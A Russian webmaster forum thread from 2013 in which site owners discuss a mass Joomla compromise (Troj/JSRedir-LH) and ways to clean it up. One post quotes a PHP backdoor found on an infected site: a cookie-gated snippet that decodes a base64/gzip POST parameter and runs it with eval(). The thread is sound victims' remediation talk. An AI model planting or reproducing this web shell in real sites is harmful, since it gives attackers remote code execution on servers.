X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Внимание! Атака на сайты Joomla, вирус Troj/JSRedir-LH
Rapturious
Rapturious
Topic Starter сообщение 4.5.2013, 8:03; Ответить: Rapturious
Сообщение #1


Новичок
*

Группа: User
Сообщений: 22
Регистрация: 14.10.2010
Поблагодарили: 2 раза
Репутация:   0  


Салют! Вчера Яндекс прислал письмецо, что сайт заражен. И вот сегодня под утро все таки выяснил в чем же дело

Внимание! Срочно обновите Joomla до последней версии 2.5.11! Обновите все установленные бесплатные расширения из каталога JED, особенно редакторы и компоненты (например формы контактов). Вчера была зафиксирована массовая атака на сайты Joomla. Сегодня уже начали поступать первые пострадавшие.

"Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации. Вредоносный код: содержит Troj/JSRedir-LH (по данным компании Sophos)."

Первые симптомы болезни: в начало каждого .js файла (можно начать проверку с каталога /media/system/js) дописывается вредоносный код, который содержит iframe на атакующий сайт. Источник.

Кто стал "счастливчиком" поделитесь методом борьбы (может кроме ай-болита есть еще методы) с этим чудовищем. В ручную все .js файлы долго вычищать.

Сообщение отредактировал Rapturious - 4.5.2013, 8:10


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rus23kav
rus23kav
сообщение 4.5.2013, 9:03; Ответить: rus23kav
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 413
Регистрация: 13.7.2011
Поблагодарили: 96 раз
Репутация:   21  


Зачем вычещать? Проще перезалить файлы движка и обновиться.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 4.5.2013, 9:40; Ответить: install
Сообщение #3


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1376 раз
Репутация:   201  


Уже весна на дворе.
Эта фигня еще в январе была запущена и большинство в том же январе залатало эти дырки и обновились.
Просыпайтесь smile.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rapturious
Rapturious
Topic Starter сообщение 4.5.2013, 9:44; Ответить: Rapturious
Сообщение #4


Новичок
*

Группа: User
Сообщений: 22
Регистрация: 14.10.2010
Поблагодарили: 2 раза
Репутация:   0  


install,
Вчера Яндекс и разбудил.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Velleks
Velleks
сообщение 5.5.2013, 2:24; Ответить: Velleks
Сообщение #5


Новичок
*

Группа: Viewer
Сообщений: 1
Регистрация: 31.1.2013
Поблагодарили: 0 раз
Репутация:   0  


Самого затронула эта проблема, тоже интересует как почистить файлы.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
meefa
meefa
сообщение 5.5.2013, 3:08; Ответить: meefa
Сообщение #6


Новичок
*

Группа: User
Сообщений: 47
Регистрация: 10.5.2011
Из: Москва
Поблагодарили: 6 раз
Репутация:   2  


Вот здесь толково написано как удалить вирус: http://fstrange.ru/coder/php/joomla-udalenie-virusov.html
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mitrokov
mitrokov
сообщение 6.5.2013, 16:54; Ответить: mitrokov
Сообщение #7


Новичок
*

Группа: Viewer
Сообщений: 1
Регистрация: 2.4.2012
Поблагодарили: 0 раз
Репутация:   0  


У себя обнаружил кучу левых файлов вида 0a41ed3.php размещаются файлы во всех папках и подкапках сайта, заметил два вида содержимого
первый:
CODE
<?php echo "#!!#";

второй :
CODE
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
?>


Если кто разбирается может разъясните что эт за фигня такая.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rapturious
Rapturious
Topic Starter сообщение 6.5.2013, 16:59; Ответить: Rapturious
Сообщение #8


Новичок
*

Группа: User
Сообщений: 22
Регистрация: 14.10.2010
Поблагодарили: 2 раза
Репутация:   0  


mitrokov,
это и есть вирус Joomla удаление вирусов


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
11 Nell 1047 Сегодня, 15:21
автор: Nell
Открытая тема (нет новых ответов) Требуется почистить сайты от вирусов
6 Mukis 309 Вчера, 15:40
автор: qpPeW
Открытая тема (нет новых ответов) Продам сайты в ГГЛ + мира + ротапост
тиц 10-40
22 xline 2389 Вчера, 12:55
автор: genjnat
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
277 kaartes 102486 7.12.2017, 9:55
автор: Tootkin
Открытая тема (нет новых ответов) Хостинг под мелкие adult сайты нужен
10 RMak 1551 6.12.2017, 22:49
автор: RICHHost


 



RSS Текстовая версия Сейчас: 11.12.2017, 21:45
Дизайн